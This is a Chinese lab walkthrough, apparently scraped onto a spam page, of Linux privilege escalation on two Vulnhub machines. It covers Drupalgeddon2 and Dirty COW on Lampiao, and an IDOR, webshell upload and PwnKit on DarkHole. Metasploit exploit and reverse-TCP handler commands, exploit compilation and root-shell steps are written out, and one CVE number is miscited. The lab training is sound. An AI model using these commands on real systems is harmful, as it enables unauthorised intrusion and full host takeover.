当前位置: 首页 > wzjs >正文

企业网站推广在哪里办推广普通话手抄报简单漂亮

wzjs 2025/8/6 10:35:05
企业网站推广在哪里办,推广普通话手抄报简单漂亮,网站真实性检验单,网站建设与设计学了做什么的案例一dirtycow(CVE-2016-5159) 有个前置知识就是 获取liunx的内核 hostnamectl uname -a 然后这个内核漏洞进行提权的步骤也是和手工win进行提权差不多 也是需要使用辅助工具在本地进行辅助检测 然后去nomi-sec/PoC-in-GitHub: &#…

案例一dirtycow(CVE-2016-5159)

有个前置知识就是  获取liunx的内核

hostnamectl

uname -a

然后这个内核漏洞进行提权的步骤也是和手工win进行提权差不多   也是需要使用辅助工具在本地进行辅助检测  然后去nomi-sec/PoC-in-GitHub: 📡 从 GitHub 自动收集 PoC。⚠️ 小心恶意软件。

去找寻exp或者使用   msf本地的  梭哈模块去寻找利用的漏洞

run post/multi/recon/local_exploit_suggester

辅助检测工具:

单一的内核漏洞检测:https://github.com/The-Z-Labs/linux-exploit-suggester

综合型的工具:

https://github.com/diego-treitos/linux-smart-enumeration
我们把.sh文件上传到/usr/share 下
然后我们扫描一下我们的靶机
https://www.vulnhub.com/entry/lampiao-1,249/
靶机下载地址
信息收集扫描ip扫描
访问80端口发现没有信息访问1898
看到这个外星人图标就知道是内网渗透中经常出现的Drupal
这个最常见的利用就是框架漏洞
发现是低版本的php搭建的 所以直接进行利用
这里我直接使用第二个exp
使用use进行调用
查看利用的配置  
检查一下payload
设置上  rhost和rport
 
报这个标头就是进入了 后渗透模式  就是我们已经控制了对方的主机
查看用户权限
找好定位我们现在是在web权限上
输入shell获取对方的命令行
查看id是1000内的所以我们的目标是拿取root权限
需要使用漏洞 先上传检测文件
报了小脏牛漏洞  直接去github上找 nomi-sec/PoC-in-GitHub: 📡 PoC auto collect from GitHub. ⚠️ Be careful Malware.
利用的exp
exp上传  
上传之后把exp.c进行编译 
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dcow.cpp -lutil

python -c 'import pty; pty.spawn("/bin/bash")' 
复现环境:https://www.vulnhub.com/entry/lampiao-1,249/
1、信息收集:
nmap -p1-65535 192.168.139.0/24
2、Web漏洞利用:
search drupal
use exploit/unix/webapp/drupal_drupalgeddon2
set rhost 192.168.46.144
set rport 1898
run
3、内核提权:
upload /root/linux-exploit-suggester.sh /tmp/1.sh
shell
cd /tmp
chmod +x 1.sh
./1.sh
https://github.com/gbonacini/CVE-2016-5195
upload /root/dcow.cpp /tmp/dcow.cpp
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dcow.cpp -lutil
python -c 'import pty; pty.spawn("/bin/bash")'
./dcow
su root

案例二  pwnkit  

靶机下载https://www.vulnhub.com/entry/darkhole-1,724/

sudo arp-scan -l

先扫描内网的ip

开放了80 

这个漏洞是前端的一个逻辑越权漏洞 先注册一个账号

账号修改里出现这个id可能就是 代表的账户 

我们试一下改为1会不会直接修改admin的账号和密码

哥斯拉生成后门 使用绕过形式 改为 .phtml 进行绕过

后门上传成功

后门地点

http://192.168.248.136/upload/xxx.phtml

学个新操做   哥斯拉联动msf(在不使用msfvemon生成反弹shell的情况下)

命令:

71  use /exploits/multi/handler
72  ip a
73  set payload php/meterpreter/reverse_tcp
74  set lport 5566
75  history

先加载再go

接受到了shell   然后进行提权

上传检测脚本

这个就是我们要学的新漏洞

第一个方法就是使用本地漏扫工具

run post/multi/recon/local_exploit_suggester
二就是  使用search 搜索cve编号看看exp库中有没有利用的
提权成功
http://www.dtcms.com/wzjs/239721.html

相关文章:

  • java网站开发实例教程下载客源引流推广
  • 肇庆网站建设百度推广助手app
  • 吉首公司网站找谁做搜索引擎优化岗位
  • 做网站的是怎么赚钱的官网优化包括什么内容
  • 软件商城免费下载安装上海知名seo公司
  • 毕业设计做系统和网站有什么区别百度认证平台
  • 医疗网站建设平台网站制作的要点和步骤详解
  • 义乌网站建设公司排名青岛seo霸屏
  • 不会写程序如何建网站2022年seo最新优化策略
  • 做壁纸壁的网站有什么区别百度一下你就知道官网网址
  • wordpress 匹配seo价格是多少
  • 诛仙3官方网站时竹任务荧灵怎么做关键词排名网络推广
  • 美食网站中饮食资讯该怎么做网络营销与电子商务的区别
  • 家政行业网站建设方案线上卖护肤品营销方法
  • 昌平网站制作公司百度广告竞价
  • 做网站外链需要多少钱独立站网站
  • 网站集约化建设规范常见的网络直接营销有哪些
  • 做农药的网站黄山网络推广公司
  • 幼儿园网站建设论文中山seo关键词
  • 做网站要知道哪些代码关键词规划师
  • 阳江做网站多少钱推广方法有哪几种
  • iis6建设网站优化人员是什么意思
  • 自己在哪里做网站中国站长之家官网
  • 广安发展建设集团公司网站怎样优化网站排名靠前
  • wordpress邮箱非必填自己怎么优化网站排名
  • wordpress媒体库限制做seo必须有网站吗
  • WordPress瀑布流图片站百度关键词怎么设置
  • 网站备案幕布照规范竞价推广方案
  • asp网站栏目如何修改公众号免费推广平台
  • 做网站要提供什么营销策划公司名字